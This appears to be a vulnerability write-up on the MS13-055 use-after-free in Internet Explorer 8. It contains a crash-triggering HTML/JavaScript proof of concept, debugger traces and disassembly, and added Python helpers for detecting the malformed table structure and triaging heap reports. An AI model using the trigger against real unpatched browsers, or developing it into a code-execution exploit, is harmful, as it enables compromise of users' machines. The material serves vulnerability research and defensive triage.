
MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free

Last updated February 13, 2020

Description

Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka “Internet Explorer Memory Corruption Vulnerability.”

Technical Analysis

Analysis

In IE8 standards mode, it is possible to cause a use-after-free condition by first creating an
illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being
a sub-table element. When the CPhraseElement's outer content is reset through an event handler
using either outerText or outerHTML, this triggers a free of its child element (in this case
a CAnchorElement, but some other objects apply too), while a reference to it is still kept in
the function SRunPointer::SpanQualifier. This function then passes the invalid reference on to
subsequent functions, and it is eventually used in mshtml!CElement::Doc when that function tries
to call the object's SecurityContext virtual function at offset +0x70, which results in a crash.
An attacker can take advantage of this by first creating a CAnchorElement object, letting it be
freed, and then replacing the freed memory with a fake object. Successfully doing so may allow
arbitrary code execution in the context of the user.

This bug is specific to Internet Explorer 8. It was originally discovered by Orange Tsai at
Hitcon 2013, but was silently patched in the July 2013 update (MS13-055).

PoC does not trigger for the following setups:

  • Win XP SP3 + IE7
  • Win 7 SP1 + IE9

PoC

<!DOCTYPE html>

<table>
    <tr>
        <div>
            <span>
                <q id='e'>
                    <a>
                        <td></td>
                    </a>
                </q>
            </span>
        </div>
    </tr>
</table>

<script>
window.onload = function(){
var x = document.getElementById('e');
x.outerHTML = '';
}
</script>
</html>

DOM Tree

CBodyElement -> CTable -> CTableSection -> CTableRow -> CPhraseElement -> CAnchorElement -> CTableCell
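The trigger condition is a structural one: a table cell whose nearest open table row is not its direct parent. The following checker, an added example and not code from the page or from the Metasploit module, flags that shape in arbitrary markup using Python's stream-based html.parser (which, unlike a browser, does not "repair" the tree, so the nesting is seen as written). POC_HTML is the table portion of the page's PoC; GOOD_HTML is a constructed, well-formed nested table for comparison.

```python
from html.parser import HTMLParser

# Table portion of the page's PoC: a <td> reached through div/span/q/a under <tr>.
POC_HTML = "<table><tr><div><span><q id='e'><a><td></td></a></q></span></div></tr></table>"
# Constructed control case: a legal nested table, every <td> directly under a <tr>.
GOOD_HTML = "<table><tr><td><table><tr><td>x</td></tr></table></td></tr></table>"


class TableCellChecker(HTMLParser):
    """Records every <td>/<th> whose nearest open <tr> is not its direct parent,
    i.e. the 'illogical table tree' shape described in the analysis."""

    def __init__(self):
        super().__init__()
        self.stack = []      # currently open elements, outermost first
        self.findings = []   # one list of intervening tag names per bad cell

    def handle_starttag(self, tag, attrs):
        if tag in ("td", "th") and "tr" in self.stack:
            # elements opened after the innermost <tr> and still open at this cell
            between = self.stack[len(self.stack) - self.stack[::-1].index("tr"):]
            if between:
                self.findings.append(between)
        self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:  # close back to the matching open tag, as a tokenizer would
            del self.stack[len(self.stack) - 1 - self.stack[::-1].index(tag):]


def find_illogical_cells(html):
    """Return the chain of elements between <tr> and each misplaced cell; [] if none."""
    checker = TableCellChecker()
    checker.feed(html)
    checker.close()
    return checker.findings


if __name__ == "__main__":
    print(find_illogical_cells(POC_HTML))   # [['div', 'span', 'q', 'a']]
    print(find_illogical_cells(GOOD_HTML))  # []
```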

Win XP SP3 + IE8

.text:63717B12 ; public: class ISpanQualifier * __thiscall SRunPointer::SpanQualifier(void)const
.text:63717B12 ?SpanQualifier@SRunPointer@@QBEPAVISpanQualifier@@XZ proc near
...
.text:63717B2D                 mov     eax, [eax+0Ch]

And then this return value is passed on to GetFancyFormat:

.text:6371DBC5                 call    ?SpanQualifier@SRunPointer@@QBEPAVISpanQualifier@@XZ ; SRunPointer::SpanQualifier(void)
.text:6371DBCA                 call    ?GetFancyFormat@ISpanQualifier@@QAEPBVCFancyFormat@@_N@Z ; ISpanQualifier::GetFancyFormat(bool)
...

In GetFancyFormat, that return value is assigned to ESI:
.text:63717F1A                 mov     esi, eax
.text:63717F1C                 call    ?IsTreeNodeQualifier@ISpanQualifier@@QBE_NXZ ; ISpanQualifier::IsTreeNodeQualifier(void)

ESI will then get assigned to ECX - "this" in C++:
.text:63717F29                 mov     ecx, esi
.text:63717F2B                 call    ?GetFancyFormat@CTreeNode@@QAEPBVCFancyFormat@@XZ ; CTreeNode::GetFancyFormat(void)

If you keep following ECX, it eventually leads to the crash.

0:008> dd ebx L30/4
06a20fb0  06a32f98 00000000 ffff0002 ffffffff
06a20fc0  00000011 00000000 00000000 00000000
06a20fd0  00000000 06a20fd8 00000012 00000000


vftable     = 06a32f98
Ref counter = 0


0:008> !heap -p -a ebx
    address 06a20fb0 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 653d418:          6a20fb0               4c -          6a20000             2000
          ? <Unloaded_pi.dll>+6a32f97
    7c918f01 ntdll!RtlAllocateHeap+0x00000e64
    636a9a94 mshtml!CHtmRootParseCtx::OverlappedEndElement+0x00000141
    636a99d3 mshtml!CHtmRootParseCtx::EndElement+0x000000cb
    635a8ee4 mshtml!CHtmTextParseCtx::EndElement+0x0000006e
    635a71eb mshtml!CHtmParse::EndElement+0x0000007b
    6359f47c mshtml!CHtmParse::CloseContainer+0x000001c5
    635bf441 mshtml!CHtmParse::CloseAllContainers+0x00000026
    635a941d mshtml!CHtmParse::PrepareContainer+0x0000007f
    635a933f mshtml!CHtmParse::ParseBeginTag+0x00000028
    635a6bb6 mshtml!CHtmParse::ParseToken+0x00000082
    635a7ff4 mshtml!CHtmPost::ProcessTokens+0x00000237
    635a734c mshtml!CHtmPost::Exec+0x00000221
    635ac2b8 mshtml!CHtmPost::Run+0x00000015
    635ac21b mshtml!PostManExecute+0x000001fd
    635ac17e mshtml!PostManResume+0x000000f8
    635ac0e2 mshtml!CHtmPost::OnDwnChanCallback+0x00000010



0:008> !heap -p -a ecx
    address 06a32f98 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    653d6c0:          6a32000             2000
    7c927553 ntdll!RtlFreeHeap+0x000000f9
    637e06f2 mshtml!CAnchorElement::`vector deleting destructor'+0x00000028
    63628a50 mshtml!CBase::SubRelease+0x00000022
    63625df6 mshtml!CElement::PrivateExitTree+0x00000011
    635c5ef1 mshtml!CMarkup::SpliceTreeInternal+0x00000083
    635c84e3 mshtml!CDoc::CutCopyMove+0x000000ca
    635c9264 mshtml!CDoc::Remove+0x00000018
    635c92e9 mshtml!RemoveWithBreakOnEmpty+0x0000003a
    63742f86 mshtml!CElement::InjectInternal+0x0000032a
    635c9415 mshtml!CElement::InjectCompatBSTR+0x00000046
    638bb56b mshtml!CElement::put_outerText+0x00000025
    6366906f mshtml!GS_BSTR+0x000001ab
    636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
    6366418a mshtml!CElement::ContextInvokeEx+0x0000009d
    6362b6ce mshtml!CInput::VersionedInvokeEx+0x0000002d
    63642eec mshtml!PlainInvokeEx+0x000000ea

.text:635C4A2E ; public: static long __stdcall CAnchorElement::CreateElement(class CHtmTag *, class CDoc *, class CElement * *)
.text:635C4A2E ?CreateElement@CAnchorElement@@SGJPAVCHtmTag@@PAVCDoc@@PAPAVCElement@@@Z proc near
.text:635C4A2E                                         ; DATA XREF: .text:6364B798o
.text:635C4A2E
.text:635C4A2E arg_4           = dword ptr  0Ch
.text:635C4A2E arg_8           = dword ptr  10h
.text:635C4A2E
.text:635C4A2E ; FUNCTION CHUNK AT .text:638589CC SIZE 0000000A BYTES
.text:635C4A2E
.text:635C4A2E                 mov     edi, edi
.text:635C4A30                 push    ebp
.text:635C4A31                 mov     ebp, esp
.text:635C4A33                 push    esi
.text:635C4A34                 push    edi
.text:635C4A35                 push    68h             ; dwBytes
.text:635C4A37                 push    8               ; dwFlags
.text:635C4A39                 push    _g_hProcessHeap ; hHeap
.text:635C4A3F                 xor     edi, edi
.text:635C4A41                 call    ds:__imp__HeapAlloc@12 ; HeapAlloc(x,x,x)



0:008> r
eax=63aae200 ebx=06a20fb0 ecx=06a32f98 edx=00000000 esi=037cd1e0 edi=00000000
eip=6363fcc4 esp=037cd1b4 ebp=037cd1cc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6363fcc4 8b01            mov     eax,dword ptr [ecx]  ds:0023:06a32f98=????????

0:008> dds 63630788+0x70 L1
636307f8  6363fc94 mshtml!CElement::SecurityContext



0:008> k
ChildEBP RetAddr
037cd1b0 63602718 mshtml!CElement::Doc
037cd1cc 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
037cd478 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
037cd488 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
037cd498 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
037cd4a8 63717f30 mshtml!CTreeNode::GetFancyFormat+0x35
037cd4b4 6371dbcf mshtml!ISpanQualifier::GetFancyFormat+0x5a
037cd4c0 6371db8f mshtml!SRunPointer::IsRelativeSpanEdge+0x3a
037cd4c8 637224a7 mshtml!SRunPointer::IsRelativeSpan+0x14
037cd4e8 63722412 mshtml!CDisplayBoxProperties::GetHasInlineOutlines+0x7d
037cd518 63723ccf mshtml!CDisplayBoxProperties::SetDisplayBoxProperties+0x24d
037cd89c 63723c13 mshtml!CPtsTextParaclient::SetupTextDisplayBox+0x90
037cd924 63723b48 mshtml!CPtsTextParaclient::SetupDisplayBoxForSpan+0x66
037cda10 6370e989 mshtml!CPtsTextParaclient::SetupDisplayBox+0x203
037cdac8 6370e73e mshtml!CPtsBfcBlockParaclient::SetupDisplayBoxForTrack+0x2b7
037cde48 636ccc93 mshtml!CPtsBfcBlockParaclient::SetupDisplayBox+0x349
037cdeec 636cca21 mshtml!CPtsTableContainerParaclient::SetupDisplayBoxForTrack+0x130
037ce408 6370c515 mshtml!CPtsTableContainerParaclient::SetupDisplayBox+0x2ad
037ce888 6370c515 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a6
037ced08 6370e989 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a6

Win 7 SP0 + IE8

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
....
0:012> g
....
(c20.274): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6b105100 ebx=08a7ffb0 ecx=08f0ff98 edx=00000000 esi=043fcf78 edi=00000000
eip=6ad8c400 esp=043fcf4c ebp=043fcf64 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6ad8c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:08f0ff98=????????
0:005> u
mshtml!CElement::Doc:
6ad8c400 8b01            mov     eax,dword ptr [ecx]
6ad8c402 8b5070          mov     edx,dword ptr [eax+70h]
6ad8c405 ffd2            call    edx
6ad8c407 8b400c          mov     eax,dword ptr [eax+0Ch]
6ad8c40a c3              ret
6ad8c40b 33c0            xor     eax,eax
6ad8c40d e9f7aeffff      jmp     mshtml!CAttrArray::PrivateFind+0x8f (6ad87309)
6ad8c412 90              nop
0:005> k
ChildEBP RetAddr
043fcf48 6adb5961 mshtml!CElement::Doc
043fcf64 6adb586d mshtml!CTreeNode::ComputeFormats+0xba
043fd210 6adba12d mshtml!CTreeNode::ComputeFormatsHelper+0x44
043fd220 6adba0ed mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
043fd230 6adba0d4 mshtml!CTreeNode::GetFancyFormatHelper+0xf
043fd240 6ac3b9c4 mshtml!CTreeNode::GetFancyFormat+0x35
043fd24c 6acb15b0 mshtml!ISpanQualifier::GetFancyFormat+0x5a
043fd258 6acb156d mshtml!SRunPointer::IsRelativeSpanEdge+0x3a
043fd260 6acb4c92 mshtml!SRunPointer::IsRelativeSpan+0x14
043fd290 6acb4bfd mshtml!CDisplayBoxProperties::GetHasInlineOutlines+0x7d
043fd2c0 6acb532e mshtml!CDisplayBoxProperties::SetDisplayBoxProperties+0x24c
043fd644 6acb5272 mshtml!CPtsTextParaclient::SetupTextDisplayBox+0x90
043fd6d4 6acb51a7 mshtml!CPtsTextParaclient::SetupDisplayBoxForSpan+0x66
043fd7c0 6ac9e4a9 mshtml!CPtsTextParaclient::SetupDisplayBox+0x203
043fd878 6ac9e271 mshtml!CPtsBfcBlockParaclient::SetupDisplayBoxForTrack+0x2b7
043fdbf8 6ac57a79 mshtml!CPtsBfcBlockParaclient::SetupDisplayBox+0x352
043fdc9c 6ac57834 mshtml!CPtsTableContainerParaclient::SetupDisplayBoxForTrack+0x133
043fe1b8 6ac9d919 mshtml!CPtsTableContainerParaclient::SetupDisplayBox+0x2ad
043fe638 6ac9d919 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a9
043feab8 6ac9e4a9 mshtml!CPtsBlockContainerParaclient::SetupDisplayBox+0x4a9
0:005> !heap -p -a ebx
    address 08a7ffb0 found in
    _DPH_HEAP_ROOT @ 51000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 83d3e04:          8a7ffb0               4c -          8a7f000             2000
    6d4f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77594ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77557d96 ntdll!RtlpAllocateHeap+0x000000c4
    775234ca ntdll!RtlAllocateHeap+0x0000023a
    6ac2565b mshtml!CHtmRootParseCtx::OverlappedEndElement+0x00000141
    6ac2557e mshtml!CHtmRootParseCtx::EndElement+0x000000cb
    6ad17870 mshtml!CHtmTextParseCtx::EndElement+0x0000006e
    6ad170b8 mshtml!CHtmParse::EndElement+0x0000007b
    6ad2a4de mshtml!CHtmParse::CloseContainer+0x000001c1
    6ad292d3 mshtml!CHtmParse::CloseAllContainers+0x00000026
    6ad18864 mshtml!CHtmParse::PrepareContainer+0x0000007f
    6ad18907 mshtml!CHtmParse::ParseBeginTag+0x00000028
    6ad16e93 mshtml!CHtmParse::ParseToken+0x00000082
    6ad175c9 mshtml!CHtmPost::ProcessTokens+0x00000237
    6ad078e8 mshtml!CHtmPost::Exec+0x00000221
    6ad08a99 mshtml!CHtmPost::Run+0x00000015
    6ad089fd mshtml!PostManExecute+0x000001fb
    6ad07c66 mshtml!PostManResume+0x000000f7
    6ad213f6 mshtml!CHtmPost::OnDwnChanCallback+0x00000010
    6ad053fc mshtml!CDwnChan::OnMethodCall+0x00000019
    6ada94b2 mshtml!GlobalWndOnMethodCall+0x000000ff
    6ad937f7 mshtml!GlobalWndProc+0x0000010c
    75bc86ef USER32!InternalCallWinProc+0x00000023
    75bc8876 USER32!UserCallWinProcCheckWow+0x0000014b
    75bc89b5 USER32!DispatchMessageWorker+0x0000035e
    75bc8e9c USER32!DispatchMessageW+0x0000000f
    6d8004a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6d810446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    763849bd iertutil!CIsoScope::RegisterThread+0x000000ab
    75f71174 kernel32!BaseThreadInitThunk+0x0000000e
    7752b3f5 ntdll!__RtlUserThreadStart+0x00000070
    7752b3c8 ntdll!_RtlUserThreadStart+0x0000001b


0:005> !heap -p -a ecx
    address 08f0ff98 found in
    _DPH_HEAP_ROOT @ 51000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    8f50138:          8f0f000             2000
    6d4f90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77595674 ntdll!RtlDebugFreeHeap+0x0000002f
    77557aca ntdll!RtlpFreeHeap+0x0000005d
    77522d68 ntdll!RtlFreeHeap+0x00000142
    75f6f1ac kernel32!HeapFree+0x00000014
    6adf8c42 mshtml!CAnchorElement::`vector deleting destructor'+0x00000028
    6ad97dd0 mshtml!CBase::SubRelease+0x00000022
    6adf0fdf mshtml!CElement::PrivateExitTree+0x00000011
    6acd5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
    6acd6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
    6acd6f39 mshtml!CDoc::Remove+0x00000018
    6acd6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
    6ac0288a mshtml!CElement::InjectInternal+0x0000032a
    6acd704a mshtml!CElement::InjectCompatBSTR+0x00000046
    6af1aee9 mshtml!CElement::put_outerText+0x00000025
    6ae172d6 mshtml!GS_BSTR+0x000001ac
    6ae0235c mshtml!CBase::ContextInvokeEx+0x000005dc
    6ae0c75a mshtml!CElement::ContextInvokeEx+0x0000009d
    6ae0c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
    6adb3104 mshtml!PlainInvokeEx+0x000000eb
    6cdea22a jscript!IDispatchExInvokeEx2+0x00000104
    6cdea175 jscript!IDispatchExInvokeEx+0x0000006a
    6cdea3f6 jscript!InvokeDispatchEx+0x00000098
    6cdea4a0 jscript!VAR::InvokeByName+0x00000139
    6cdfd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6cde9c0e jscript!CScriptRuntime::Run+0x0000208d
    6cdf5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6cdf5bfb jscript!ScrFncObj::Call+0x0000008d
    6cdf5e11 jscript!CSession::Execute+0x0000015f
    6cdef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6cdeea2e jscript!NameTbl::InvokeEx+0x0000012c
    6ae27af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
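The two `!heap -p -a` reports above carry the whole use-after-free signature: the object in EBX is still a busy allocation, while the pointer it hands on in ECX lands in a freed block whose free stack names both the object type (the CAnchorElement destructor) and the DOM operation that released it. The parser below, added here as an example and not part of the page's own tooling, extracts those facts from page-heap output so the triage can be repeated mechanically; the two sample reports are excerpts of the Win XP SP3 + IE8 session shown above, trimmed to the frames the parser needs.

```python
import re

# Excerpts of the page's "!heap -p -a ebx" and "!heap -p -a ecx" reports (XP SP3 + IE8).
REPORT_EBX = """\
    address 06a20fb0 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 653d418:          6a20fb0               4c -          6a20000             2000
    7c918f01 ntdll!RtlAllocateHeap+0x00000e64
    636a9a94 mshtml!CHtmRootParseCtx::OverlappedEndElement+0x00000141
"""
REPORT_ECX = """\
    address 06a32f98 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    653d6c0:          6a32000             2000
    7c927553 ntdll!RtlFreeHeap+0x000000f9
    637e06f2 mshtml!CAnchorElement::`vector deleting destructor'+0x00000028
    63628a50 mshtml!CBase::SubRelease+0x00000022
    638bb56b mshtml!CElement::put_outerText+0x00000025
"""

FRAME_RE = re.compile(r"^\s*[0-9a-f]{8}\s+(.+?)\+0x[0-9a-f]+\s*$")   # "<ret> module!symbol+0x.."
BLOCK_RE = re.compile(r"^\s*[0-9a-f]+:\s+([0-9a-f \-]+?)\s*$", re.M)  # DPH_HEAP_BLOCK numbers


def parse_heap_report(text):
    """Parse one windbg page-heap (`!heap -p -a`) report into address, state, sizes, frames."""
    addr = re.search(r"address ([0-9a-f]+) found in", text)
    state = re.search(r"in (busy|free-ed) allocation", text)
    block = BLOCK_RE.search(text)
    if not (addr and state and block):
        raise ValueError("not a DPH_HEAP_BLOCK report")
    nums = [int(tok, 16) for tok in block.group(1).split() if tok != "-"]
    rep = {"address": int(addr.group(1), 16), "state": state.group(1), "virt_size": nums[-1],
           "frames": [m.group(1) for m in map(FRAME_RE.match, text.splitlines()) if m]}
    if rep["state"] == "busy":        # busy blocks also carry UserAddr/UserSize
        rep["user_size"] = nums[1]
    return rep


def triage_freed_block(rep):
    """For a freed block: object type from its destructor frame and the DOM property
    setter that caused the free. Returns None for a block that is still live."""
    if rep["state"] != "free-ed":
        return None
    dtor = next((f for f in rep["frames"] if "destructor" in f), "")
    obj = dtor.split("!", 1)[-1].split("::", 1)[0] if dtor else None
    setter = next((f for f in rep["frames"] if "::put_" in f), None)
    return {"object": obj, "setter": setter}
```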
